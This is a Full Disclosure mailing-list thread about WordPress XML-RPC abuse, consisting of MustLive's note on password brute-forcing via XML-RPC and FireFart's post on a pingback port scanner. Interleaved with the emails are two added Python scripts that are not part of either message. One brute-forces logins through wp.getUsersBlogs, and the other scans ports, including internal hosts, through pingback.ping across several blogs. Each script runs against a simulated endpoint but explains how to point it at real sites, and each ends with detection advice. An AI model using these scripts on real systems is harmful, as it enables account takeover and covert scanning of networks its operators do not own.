Full Disclosure mailing list archives

Re: Wordpress Pingback Port Scanner


From: "MustLive" <mustlive () websecurity com ua>
Date: Sat, 19 Jan 2013 20:53:24 +0200

Hi Chris!

It's good that you've drawn attention to the possibility of port scanning and 
made nice software for abusing this WP feature.

But I want to remind you about another vulnerability in XML-RPC, which I 
disclosed in 2012. The most important hole in WordPress XML-RPC is Brute 
Force (http://securityvulns.ru/docs27916.html, 
http://lists.grok.org.uk/pipermail/full-disclosure/2012-March/086271.html). 
I wrote about it using WordPress as the example, but it concerns every web 
application with XML-RPC support. All versions of WP are vulnerable to BF, 
but since WordPress 2.6 XML-RPC was turned on by default.

And when WordPress developers turned it on in WordPress 3.5, they returned 
the hole to the masses. Earlier, for WP 2.6 - 3.4.2, only those web sites 
which had turned it on were vulnerable; since WP 3.5 all web sites would be 
vulnerable again.

The interesting part about Brute Force attacks via XML-RPC, and likewise via 
the Atom Publishing Protocol (to which WP 2.3 - 3.4.2 are vulnerable; I also 
disclosed this hole in 2012: http://securityvulns.ru/docs27917.html, 
http://lists.grok.org.uk/pipermail/full-disclosure/2012-March/086328.html), 
as I wrote at my site, is that they are more reliable than brute forcing via 
the login form. Because unlike the login form (for which there are plugins to 
protect against BF), no plugins can protect against attacks via XML-RPC and 
AtomPub.

WP developers removed AtomPub from the core (made it a plugin), so they 
"removed" this BF hole from the core, but at the same time they enabled the BF 
hole via XML-RPC (plus added port scanning functionality). Such a wise 
decision :-).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
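
The XML-RPC brute-force path MustLive describes, as an added example that is not part of either message and is neither MustLive's nor FireFart's code: the client keeps calling wp.getUsersBlogs, which needs only a username and password, and tells a wrong password from a right one by the fault code in the reply. The endpoint below is a constructed stand-in for WordPress's xmlrpc.php; the account name, password, site URL and wordlist are assumptions, and the transport is a plain callable so the whole exchange runs offline. Against a real site the same request body would be POSTed to /xmlrpc.php.

```python
import xmlrpc.client as xc

# Constructed stand-in for a WordPress site with one account (assumption, not a real site).
SITE = "http://blog.example"
VALID_CREDS = {"admin": "Winter2012!"}


def fake_wordpress_xmlrpc(request_body: bytes) -> bytes:
    """Simulated xmlrpc.php (constructed, not WordPress code): answers wp.getUsersBlogs
    the way WordPress does, with XML-RPC fault 403 for a bad username/password pair."""
    params, method = xc.loads(request_body.decode())
    if method != "wp.getUsersBlogs":
        fault = xc.Fault(-32601, "server error. requested method not found")
        return xc.dumps(fault, methodresponse=True).encode()
    username, password = params
    if VALID_CREDS.get(username) != password:
        fault = xc.Fault(403, "Bad login/pass combination.")
        return xc.dumps(fault, methodresponse=True).encode()
    blogs = [{"isAdmin": True, "url": SITE + "/", "blogid": "1",
              "blogName": "Example blog", "xmlrpc": SITE + "/xmlrpc.php"}]
    return xc.dumps((blogs,), methodresponse=True).encode()


def build_login_probe(username: str, password: str) -> bytes:
    """Body of the POST to /xmlrpc.php that tries one credential pair."""
    return xc.dumps((username, password), methodname="wp.getUsersBlogs").encode()


def classify(response_body: bytes):
    """Map the XML-RPC response to (status, detail): fault 403 means wrong password,
    a blog list means the pair is valid, anything else is an error worth logging."""
    try:
        (blogs,), _ = xc.loads(response_body.decode())
    except xc.Fault as fault:
        if fault.faultCode == 403:
            return ("invalid", fault.faultCode)
        return ("error", fault.faultCode)
    return ("valid", blogs)


def brute_force(send, username: str, wordlist):
    """Try each password through `send` (a transport callable: request bytes -> response bytes).
    Returns (password_or_None, attempts)."""
    attempts = 0
    for password in wordlist:
        attempts += 1
        status, _ = classify(send(build_login_probe(username, password)))
        if status == "valid":
            return password, attempts
    return None, attempts


if __name__ == "__main__":
    # Constructed wordlist; against a real site `send` would POST to SITE + "/xmlrpc.php".
    print(brute_force(fake_wordpress_xmlrpc, "admin", ["password", "admin", "Winter2012!"]))
```

Nothing here touches wp-login.php, which is why a login-form rate limiter never sees these attempts: the only server-side trace is a burst of POST requests to /xmlrpc.php whose bodies name wp.getUsersBlogs, so that is what a detection rule or a web-server ACL has to key on.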

From: FireFart_(at)_gmail.com <FireFart_(at)_gmail.com>
Date: 18.12.2012
Subject: Wordpress Pingback Port Scanner

Hi folks,
Wordpress 3.5 has its XML-RPC Interface enabled by default. See here for 
more information:
http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/
http://codex.wordpress.org/Version_3.5#Settings

I read through the article and took a look at the Pingback API since it is 
publicly available on many Wordpress installations.
The cool thing is: you can do a port scan using the Pingback API.
You can even scan the server itself or discover some hosts on the internal 
network this server is on.
So I wrote this little Ruby script to utilize this "feature":

https://github.com/FireFart/WordpressPingbackPortScanner

You can even use multiple Wordpress XML-RPC Interfaces to scan a single 
host so this can be some kind of distributed port scanning.

Chris 
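
The pingback port scan Chris describes, as an added example that is not part of his message and is not the code from his Ruby scanner: each pingback.ping call names a sourceURI of the form http://host:port/, WordPress tries to fetch it to check for a link back, and the fault code it returns (16 when the fetch failed, 17 when something answered but contained no link) tells the caller whether that port accepted a connection. The endpoint below is a constructed stand-in for xmlrpc.php with a made-up map of open ports behind it; the blog URL, post and hosts are assumptions, and endpoints are plain callables so the scan runs offline. The rotation over several endpoints shows the distributed variant Chris mentions.

```python
import xmlrpc.client as xc
from itertools import cycle
from urllib.parse import urlsplit

# Constructed model of what sits behind the (fake) WordPress host: which host:port
# pairs accept a TCP connection. Assumption for the demo, not real infrastructure.
OPEN_PORTS = {"10.0.0.5": {22, 80}, "127.0.0.1": {3306}}
# A post that exists on the blog; pingback.ping refuses targets that are not posts.
TARGET_POST = "http://blog.example/?p=1"


def _fault(code: int, message: str) -> bytes:
    """Serialise an XML-RPC fault response."""
    return xc.dumps(xc.Fault(code, message), methodresponse=True).encode()


def fake_pingback_endpoint(request_body: bytes) -> bytes:
    """Simulated pingback.ping handler (constructed, not WordPress code). It 'fetches'
    the source URI and reports the outcome with WordPress's pingback fault codes."""
    params, method = xc.loads(request_body.decode())
    if method != "pingback.ping":
        return _fault(-32601, "server error. requested method not found")
    source, target = params
    if target != TARGET_POST:
        return _fault(33, "The specified target URL cannot be used as a target.")
    url = urlsplit(source)
    port = url.port or (443 if url.scheme == "https" else 80)
    if port in OPEN_PORTS.get(url.hostname, set()):
        # The connection succeeded and something answered, but no link back was found.
        return _fault(17, "The source URL does not contain a link to the target URL, "
                          "and so cannot be used as a source.")
    # Connection refused or timed out: WordPress reports the source as non-existent.
    return _fault(16, "The source URL does not exist.")


def build_ping(host: str, port: int, target: str = TARGET_POST) -> bytes:
    """pingback.ping request whose sourceURI points at the host:port to be probed."""
    return xc.dumps((f"http://{host}:{port}/", target), methodname="pingback.ping").encode()


def interpret(response_body: bytes) -> str:
    """Translate the fault code into a port state; anything unexpected is reported as-is."""
    try:
        xc.loads(response_body.decode())
    except xc.Fault as fault:
        return {16: "closed", 17: "open"}.get(fault.faultCode, f"unknown({fault.faultCode})")
    return "open"  # a non-fault reply means the source was fetched, so the port answered


def scan(endpoints, host: str, ports, target: str = TARGET_POST) -> dict:
    """Probe each port of `host` through the given WordPress endpoints (transport
    callables), rotating between them so the probes are spread over several blogs."""
    rotation = cycle(endpoints)
    return {port: interpret(next(rotation)(build_ping(host, port, target))) for port in ports}


if __name__ == "__main__":
    # Constructed run: one fake blog probing three ports on an internal host.
    print(scan([fake_pingback_endpoint], "10.0.0.5", [22, 23, 80]))
```

Every probe leaves the blog's address, not the scanner's, in the target's connection logs, and on the blog itself the only trace is a POST to /xmlrpc.php whose body calls pingback.ping with a sourceURI on a private address or an unusual port; that combination is what a WordPress operator would alert on or drop at the web server.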


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

